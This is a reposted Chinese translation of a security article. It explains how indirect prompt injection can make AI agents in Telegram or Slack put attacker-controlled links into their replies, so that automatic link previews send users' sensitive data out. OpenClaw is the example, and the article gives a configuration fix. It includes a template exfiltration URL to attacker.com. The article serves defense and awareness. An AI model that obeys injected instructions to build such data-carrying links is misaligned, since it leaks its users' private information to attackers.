2026-03-03 05:10:52 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文档揭示了即时通讯应用中AI智能体的数据泄露风险，源于链接预览与间接提示注入的结合。攻击者诱导模型生成含敏感数据的恶意链接，应用自动预览时即触发数据外传，无需用户交互。以Telegram上的OpenClaw为例，默认配置存在漏洞，建议禁用链接预览功能。文章呼吁开发者在智能体与接口层面实施双重防护，并提供了风险验证方法。 综合评分： 88 文章分类： AI安全,漏洞分析,数据泄露,应用安全,威胁情报

cover_image

即时通讯应用中的智能体数据泄露

原创

promptarmor promptarmor

安全行者老霍

2026年2月26日 09:00 北京

通过即时通讯应用（如Slack和Telegram）与AI 智能体（如OpenClaw）进行交互正日益普及。但这可能使用户暴露于一种鲜为人知的、针对大型语言模型的数据外泄风险–因为这些应用支持“链接预览”功能。启用预览功能后，当用户收到LLM生成的消息中的恶意链接时，数据可能被自动窃取–而未启用预览时，通常需要用户主动点击恶意链接才会发生数据泄露。例如，通过Telegram使用的OpenClaw默认处于风险状态。

通过间接提示注入从基于大型语言模型的应用程序窃取数据的基本技术，是诱导模型输出一个由攻击者控制的链接，并在URL中附加敏感用户数据。若用户点击该链接，数据即被窃取。

当用户通过应用程序（如Telegram和Slack）向AI智能体发送查询时，可能在不知情的情况下触发更严重的攻击。这些应用支持消息中链接的“预览”功能；链接预览会触发与点击链接相同的网络请求–无需用户点击操作。这意味着在支持链接预览的智能体系统中，当AI智能体响应用户时，数据窃取可能立即发生，用户甚至无需点击恶意链接。

本文将详细解析攻击链，并提供可验证您所用智能体系统风险的测试方法。当前热门的OpenClaw系统在使用Telegram默认配置时存在此漏洞，文末附有安全配置示例。我们认为不安全的预览功能很可能影响众多其他智能体系统。

本文希望提升对此类风险的认知。我们期待未来典型的智能体系统能受益于双重防护机制：既由智能体开发者提供安全加固，也由集成智能体的接口开发者实施防护措施。

在不可信数据源中进行间接提示注入，可诱使AI模型返回包含敏感数据的恶意URL。当用户预览该URL时，数据即被窃取。

传统上，消息和协作应用支持URL预览功能，用于显示用户共享链接的元数据（如缩略图、标题和描述）。

对于大型语言模型而言，这种情况变得危险。间接提示注入可操纵AI代理在其对用户的响应中植入恶意URL。此类攻击中，攻击者会诱使代理构造使用攻击者域名的URL，并在末尾附加动态生成的查询参数–这些参数包含模型所知的用户敏感数据。

attacker.com/?data={AI在此处添加敏感数据}

移动设备渲染恶意URL预览的模型（该URL来自攻击者网站，并附加了用户敏感数据作为查询参数）。

当AI智能体向用户发送包含恶意URL的消息时，若未预览URL，攻击需要用户点击恶意链接，从而触发向攻击者服务器的网络请求（导致URL中存储的数据暴露）。但若启用URL预览功能，系统将自动向攻击者域名发起请求以获取预览元数据–全程无需用户交互。预览请求完成后，攻击者可通过分析请求日志，读取模型附加在预览请求URL中的敏感用户数据。

安全配置OpenClaw Telegram

使用电报与OpenClaw通信的用户，可通过明确配置禁用链接预览功能！禁用链接预览后重新尝试上述实验，您将发现数据不再发送至AITextRisk.com！

在文件 ~/.openclaw/openclaw.json 中，于 channels > telegram 对象内添加一行：linkPreview: false。

测试结果

在AITextRisk.com上，您可以查看您的智能体系统何时创建了网站预览，以及预览请求中传递了哪些数据。我们还提供了用于创建URL预览的最常用抓取工具图表（如Slackbot、Telegram机器人等）。此外，用户可“申领”日志以报告具体智能体系统；该功能可生成高风险智能体/应用组合的展示列表。我们同时允许用户上报经测试未生成预览的智能体系统，从而提供哪些智能体系统未出现不安全链接预览的数据。整体而言，这使您能够检测所用智能体系统是否会为大型语言模型生成的消息中的URL生成不安全预览。

众多智能体系统正被集成到各类应用中。通信应用需向开发者开放链接预览偏好设置，而代理开发者则应利用这些偏好（或将选择权交给终端用户！）。我们期待通信应用考虑支持基于聊天/频道的自定义链接预览配置，从而创建大型语言模型安全的交流渠道。

https://www.promptarmor.com/resources/llm-data-exfiltration-via-url-previews-(with-openclaw-example-and-test)

（完）

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全行者老霍 promptarmor promptarmor《即时通讯应用中的智能体数据泄露》